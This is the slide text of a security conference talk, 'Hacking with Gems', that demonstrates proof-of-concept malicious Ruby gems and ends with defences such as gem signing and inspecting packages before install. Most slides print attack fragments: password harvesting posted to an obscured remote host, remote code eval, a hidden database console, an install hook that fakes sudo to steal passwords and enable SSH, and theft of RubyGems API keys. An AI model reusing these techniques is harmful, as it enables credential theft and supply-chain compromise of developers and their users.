Tweet
Tweet

Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith

Slide 2

Slide 2 text

How-to get rich quick and (maybe) not go to jail!

Slide 3

Slide 3 text

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

Slide 4

Slide 4 text

who i am

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

what i am NOT

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

please do not try this at home

Slide 11

Slide 11 text

please do not try this at home

Slide 12

Slide 12 text

how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ...

Slide 13

Slide 13 text

what’s the worst that could happen?

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 16

Slide 16 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 17

Slide 17 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 18

Slide 18 text

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 19

Slide 19 text

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 20

Slide 20 text

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 21

Slide 21 text

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 22

Slide 22 text

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 23

Slide 23 text

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 24

Slide 24 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 25

Slide 25 text

profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit

Slide 26

Slide 26 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4:

Slide 27

Slide 27 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

Slide 28

Slide 28 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

Slide 29

Slide 29 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

Slide 30

Slide 30 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

Slide 31

Slide 31 text

a one way ticket to

Slide 32

Slide 32 text

that was easy. what else can I do?

Slide 33

Slide 33 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

Slide 34

Slide 34 text

show me the hack Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

Slide 35

Slide 35 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 36

Slide 36 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 37

Slide 37 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 38

Slide 38 text

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

Slide 39

Slide 39 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 40

Slide 40 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 41

Slide 41 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 42

Slide 42 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 43

Slide 43 text

/users/sign_in github.com/benjaminleesmith/net_http_detector

Slide 44

Slide 44 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

Slide 45

Slide 45 text

hello db access! github.com/benjaminleesmith/net_http_detector

Slide 46

Slide 46 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

Slide 47

Slide 47 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

Slide 48

Slide 48 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

Slide 49

Slide 49 text

careful of wolves in sheep’s clothing

Slide 50

Slide 50 text

profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5:

Slide 51

Slide 51 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5:

Slide 52

Slide 52 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

Slide 53

Slide 53 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

Slide 54

Slide 54 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

Slide 55

Slide 55 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

Slide 56

Slide 56 text

i like the beach

Slide 57

Slide 57 text

that was easy. what else can I do?

Slide 58

Slide 58 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

Slide 59

Slide 59 text

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1 Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s

Slide 60

Slide 60 text

No content

Slide 61

Slide 61 text

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

Slide 62

Slide 62 text

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0 8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

Slide 63

Slide 63 text

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

Slide 64

Slide 64 text

what what github.com/benjaminleesmith/better_date_to_s

Slide 65

Slide 65 text

i can haz source github.com/benjaminleesmith/better_date_to_s

Slide 66

Slide 66 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

Slide 67

Slide 67 text

so much code so little time • Step 1: write a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

Slide 68

Slide 68 text

that was easy hard. what else can I do? (that's easier)

Slide 69

Slide 69 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 70

Slide 70 text

what it does > true.should be_true > User.new.should be_true > User.new.should be_truthy github.com/benjaminleesmith/be_truthy

Slide 71

Slide 71 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy

Slide 72

Slide 72 text

github.com/benjaminleesmith/be_truthy

Slide 73

Slide 73 text

file tree looks ok github.com/benjaminleesmith/be_truthy

Slide 74

Slide 74 text

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

Slide 75

Slide 75 text

but what was this? github.com/benjaminleesmith/be_truthy

Slide 76

Slide 76 text

I see no C github.com/benjaminleesmith/be_truthy

Slide 77

Slide 77 text

run the what file? Gem::Specification.new do |gem| ... gem.extensions = ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

Slide 78

Slide 78 text

there is no Rakefile github.com/benjaminleesmith/be_truthy

Slide 79

Slide 79 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 80

Slide 80 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 81

Slide 81 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy

Slide 82

Slide 82 text

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

Slide 83

Slide 83 text

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

Slide 84

Slide 84 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

Slide 85

Slide 85 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy

Slide 86

Slide 86 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 87

Slide 87 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 88

Slide 88 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 89

Slide 89 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 90

Slide 90 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

Slide 91

Slide 91 text

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl . -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

Slide 92

Slide 92 text

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

Slide 93

Slide 93 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

Slide 94

Slide 94 text

take away: don't install ben's gems

Slide 95

Slide 95 text

No content

Slide 96

Slide 96 text

how could I get you to install my gems?

Slide 97

Slide 97 text

what gems are trustworthy?

Slide 98

Slide 98 text

how can I add my code to already trusted gems?

Slide 99

Slide 99 text

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

Slide 100

Slide 100 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 101

Slide 101 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 102

Slide 102 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 103

Slide 103 text

now I own your gems github.com/benjaminleesmith/be_truthy

Slide 104

Slide 104 text

> git clone your-gem-repo ...add a little code... > rake build > gem push your-gem github.com/benjaminleesmith/be_truthy

Slide 105

Slide 105 text

do people trust your gems?

Slide 106

Slide 106 text

do people who install your gems have trustworthy gems?

Slide 107

Slide 107 text

No content

Slide 108

Slide 108 text

there’s still one problem

Slide 109

Slide 109 text

bootstrapping

Slide 110

Slide 110 text

being popular sucks

Slide 111

Slide 111 text

conferences

Slide 112

Slide 112 text

webmock

Slide 113

Slide 113 text

rspec-given

Slide 114

Slide 114 text

quacky

Slide 115

Slide 115 text

social engineering

Slide 116

Slide 116 text

No content

Slide 117

Slide 117 text

No content

Slide 118

Slide 118 text

• matt • smoe • bttf • james • tlittle • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb

Slide 119

Slide 119 text

so what happens now?

Slide 120

Slide 120 text

ruby gems goes down

Slide 121

Slide 121 text

heroku deploys go down

Slide 122

Slide 122 text

i go to the beach

Slide 123

Slide 123 text

ruby gems goes down

Slide 124

Slide 124 text

heroku deploys go down

Slide 125

Slide 125 text

recovery

Slide 126

Slide 126 text

so what now?

Slide 127

Slide 127 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 128

Slide 128 text

Little Snitch obdev.at/products/littlesnitch/index.html

Slide 129

Slide 129 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 130

Slide 130 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start

Slide 131

Slide 131 text

don’t “gem install” from strangers

Slide 132

Slide 132 text

gem fetch vs gem install > gem fetch be_truthy > gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy

Slide 133

Slide 133 text

No content

Slide 134

Slide 134 text

No content

Slide 135

Slide 135 text

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

Slide 136

Slide 136 text

gem install rails -P HighSecurity

Slide 137

Slide 137 text

> gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR: While executing gem ... (Gem::Exception) Unsigned gem

Slide 138

Slide 138 text

gem cert --build

Slide 139

Slide 139 text

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

Slide 140

Slide 140 text

sandboxing

Slide 141

Slide 141 text

github.com/rubygems/rubygems

Slide 142

Slide 142 text

tools to detect malicious code

Slide 143

Slide 143 text

private gem repos

Slide 144

Slide 144 text

do not try this at home

Slide 145

Slide 145 text

don't install gems you don't need to

Slide 146

Slide 146 text

pay attention to what your gems do

Slide 147

Slide 147 text

monitor your system

Slide 148

Slide 148 text

read the source

Slide 149

Slide 149 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

Slide 150

Slide 150 text

on install github.com/benjaminleesmith/coal-mine-canary

Slide 151

Slide 151 text

the results github.com/benjaminleesmith/coal-mine-canary

Slide 152

Slide 152 text

thank you!

Slide 153

Slide 153 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith